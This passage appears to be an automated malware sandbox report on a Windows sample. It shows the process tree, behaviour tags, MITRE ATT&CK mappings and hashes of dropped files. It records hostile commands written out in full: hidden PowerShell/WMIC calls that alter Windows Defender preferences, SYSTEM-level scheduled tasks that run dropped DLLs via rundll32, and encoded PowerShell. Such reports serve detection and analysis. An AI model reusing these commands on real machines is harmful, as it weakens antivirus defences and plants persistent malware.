C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2788
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:268
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\namDtuGKU\JlXNdO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jRbEfcGJuWiRduS" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jRbEfcGJuWiRduS2" /F /xml "C:\Program Files (x86)\namDtuGKU\AwDTDEC.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jRbEfcGJuWiRduS"3⤵PID:2416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jRbEfcGJuWiRduS"3⤵PID:2120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uzHildQRZSydMh" /F /xml "C:\Program Files (x86)\wEnnazEvJNiU2\onKGMDP.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NvQssOSfNTtis2" /F /xml "C:\ProgramData\BRUhuLZnBvQZvqVB\zJmgQjf.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HALKbVmngXfRdKBpU2" /F /xml "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\jkIVRre.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KQGqlBuRrHzEMwByVTe2" /F /xml "C:\Program Files (x86)\bgwuTdWixDdNC\GDomnjv.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kPVQaxkVtdiJeIOQR" /SC once /ST 01:12:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\oYSPpkCr\CXuhaHS.dll\",#1 /kdidRe 385137" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kPVQaxkVtdiJeIOQR"3⤵PID:1604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KdMGsZYUagVlNoZLt"3⤵PID:964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 15603⤵
- Loads dropped DLL
- Program crash
PID:1332
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\sFyaDrJXZzAeWCdu\oYSPpkCr\CXuhaHS.dll",#1 /kdidRe 3851372⤵PID:2632
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\sFyaDrJXZzAeWCdu\oYSPpkCr\CXuhaHS.dll",#1 /kdidRe 3851373⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kPVQaxkVtdiJeIOQR"4⤵PID:2352
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D19EB15D-FFAE-4825-B505-EEC8F8E540B1} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:284 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1736
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1756
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1456
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2072
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:308
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2328
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e778fc8b64a43dc517a0ce7a201295a7
SHA18ea3e6a76e01c22cbd1b3a09ac7746189910dc6e
SHA256d3a4c025d679e0f9ec71f180c353d43599f06b02ef0a845349403b9399bc2d94
SHA512a89fb67d3ca76a5ac20c69b15ee0024431aa23056f0f0d7e3ae9f4730a7222b9e0e10abcf7f3eca410726440228baca622f24414a5337a4ebf55a9ac1e902c3f
-
Filesize
2KB
MD5dc6cb0089a57cfa852a57a6c054a5507
SHA1875e206d01e423dd8161e0966dc883239fcd6766
SHA256319fce081511fcbe06da16ffbf30f93062741bb3ce605401800ea7a1a04868d6
SHA5127fc07775b5fa38d1cbfbed176287f37703938d26a1e0aa277364b2c54427ad5842b9d15f9ca3dd239221dd861d10f4c1048fdaae03efea09132fb84eefe5ec19
-
Filesize
2KB
MD5dd74f313fb9a653d870b11ae36c56a57
SHA1723ce77043edbcbbfa8ebb340020574ab5d5bcc4
SHA256e6b92279ae1ec1ce44437a26b3e32074bfd9dec02fc94a6a840dba26a9060644
SHA512f72a36828089c9ae6adb330a5177ed2026b9a660b30a58812b4dbc5748eb7101f92a06fb6aa425e5317e32ab17523bf9f540f0485eda078765413ede5445a8d3
-
Filesize
2KB
MD51e299ac21c345917cef18778e22764a3
SHA1dc2e99c4f0f768d6ef6aa4fbd2ad18d4148eb780
SHA256eac80d5fe42707d8fd3d4fb248adc7d9ca51d54a38f02a12ffd4360ec646c0ad
SHA512213bfc3f664c71d854199e96962f8ef96556105015f417e4ef0fd5b67b8a67f399d5ffaac36c7b3d6ccae624a093b72189963dcc5bfa7e32910635bb94518ed4
-
Filesize
2.5MB
MD5f3411ed001fd4203a142d3e7c37f1bf8
SHA12f7c196e54e489c59230856337072b0f1d1bda7c
SHA256e8a8f359963da97fd9b17ddebaf19d15586a8f7e3e0c7a0fd3adcfc9bcbf2bc4
SHA512923588dbf51a767cdb6dc0779c8a9c771877160207a298d6033326bb7996725781ba86fbce39e0470207e42ab98abd34cb3188380b8b61bcc90a186ce7ddae48
-
Filesize
2KB
MD510de5883067702771ee31c8df4a27cac
SHA14fd854d4312720ee316b0bd6bf19d32aaacf3d81
SHA256ed55d63581118c1db91b29d4b9252cecbb27ac3dfd68248a85e675ae28be0e8b
SHA512805edc9a99bd31c2a0add07cf748ed0a7432606a82a8ce2064fb842d05d7d5bd8140c8f4efb190f01f264ac6ae9d71ea5ae52ce75cd442edb0ca91adef6153da
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD52d1dc44c31c206a96703bfd7b06a3940
SHA1a9a408e9a08a7294a0c77fd2ff70b1448e4f2d6c
SHA2568a168f660bcf558e0e52cb8389474b38aed874585f1049274649dda7e325bc1c
SHA512181dc5ff669c5f4a3c9f04cf900e784dafe6712e06bae878ee43f247976ddda2b039062fef63cc93e815eb3f2b7fe5c1bf349479e192fa3c7bb688443cf6dc4d
-
Filesize
27KB
MD5f762d1fb98e24d49f3b16c65c8d0a56c
SHA1c70c62f10094093fdf6976b757c942c48c24d771
SHA256e893d61db1f4604d2582ea88c6a3d615b44b2f26e4d8033bc1a81eaa11fd1798
SHA512d6036e3aacccf75a22463703f9458347fe903c887e5547fe4060c4e94ff96b30283e86c3d3b620f2517c3ec2afffa6324439e67cf6b7b58c0cf54ca7340e5841
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5162659726fafe15b3e2bb2821bc58673
SHA12006137ccdd2e884648c86435bad579ea3a1d106
SHA256fe072c9d4505bd3a41287044f37be425f8df15f6fac63ad97d2216c3c31575c0
SHA51289f91bcb06e5ac50f8b2ecc4d8cf6cb547ea8ca3834096df422df3bfaf3c2d7edf3a62b07bb697bd591b8fdfdd961651fccd946e1691b9787bed4c54b49fc11e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6BJ1NJ9CYPBP7QZ2GKZ.temp
Filesize7KB
MD55b7a4e1ce9ef0e4c63bca379bfbf2fca
SHA1e21f3bde90b80653a8dc05fcccfc72deeb06fe02
SHA256d00005baf103e3c116c729b193b44f78cae11c47fe7b08447522686b0047702c
SHA512cb85f1d17626ff6b9e4f41efc6af8618b2969a1def2e0f1f7ac2fbfc54b664417a093160228c0094cbef0b2b2ed0627f9ae8ee7306f6d7d37cde9968c31ca5fe
-
Filesize
6KB
MD5df43c898f251de7a6e813821d6d54c6c
SHA1e2f2dbdd30e02d9fb308aa78e97a5e2498865a56
SHA2566ccd4cdc2f5f54741d4b8ef9ce24ddde875ff0dbbd8b228f3c01c3a5bcf14e8f
SHA5125f817086979cbfb2906711c8e278bb73614e9a712b9984112c851aa7ae8ae3cfeff2bd3662ee87c5ff14a14af121e758584836d74a8f596a0fb17db7832abeea
-
Filesize
9KB
MD5e5df5642a8e405ba446b575b76068496
SHA169bf036d027bc4e6163bebafb3313b3a83480512
SHA25665ed6d11f51a5890e7fc61984d0a9d7c3f6761f02bcfabebd6c4e7752a6fe2ca
SHA512b8cb4e9062da85cd26733082fc28aa57bed1fcceb5309ba13576b01860aaab2124b612a78645b2028e9d31863155c37e1fd47b36d1d92763a6c85c1d116a59a5
-
Filesize
6.5MB
MD54dd6ffe036a2c5436f1e1e9d62c6f2bf
SHA148e9ca2c44a1e49133396c24d4901c2a4778309d
SHA256020dcc1479e413605e030d3596f00def68b27c1ad753f21c698dcede2e64b414
SHA512865c22e1a47fbc9c919c7f1a18df8f33c4c9e5f257f1f5ac86df15bbc11051d8cdd69659ba22db964d389be482fba65a82fa5f85b917a43a65781eb06e4744a5
-
Filesize
6KB
MD566e6079dc2fa61aff85a1a32674647c3
SHA19747b3387c46ae5a6fee65d3f68018b280825dd3
SHA2561c16e90fa8656592659962265eef676582f8887ed522840df4e6933d7933e9a3
SHA5125121963de6f5a60b978cc0c4779216a93b0caee1b679378e4cbf77861cbac21c112f96ccaa5185a1ad063f16d015087696955fbc592e5daa55b49ce1c0acbb52
-
Filesize
6.4MB
MD5691e65471cd2adec7bdae1b50b507756
SHA14003e0fc3998b6dbe9c5574cd1e010d81a8678b4
SHA2568eba367390aed7a834441c860d25e35f21bb50aeb10c8ed05c587cb5f858b667
SHA5120be5fd480468db05d9d16ee07fb6f272615152b3fc90f4cf8ce92edf2a3ebc79cdd0b3a27a0e38c9254f0cf2bcb9745ed10dc4545479dfa15d3fa139dcd48dc4
-
Filesize
6.7MB
MD571bf676ae80afa9f2577d2eae6a133ae
SHA10fedcfbd17c9a11a97ce5c6b984926b5a510f533
SHA2569f803c1fd9944d0050032ecd983de008c13c0e939e66d13c1d138551d290be99
SHA512f8150af3a932ead9e6968569978ddba194b6355d4ac65bfcd7e54302e2f7f4b944c27baf3763297f5edc2d8eddb89bafea2489a79e1a77c695cc65fd967cf545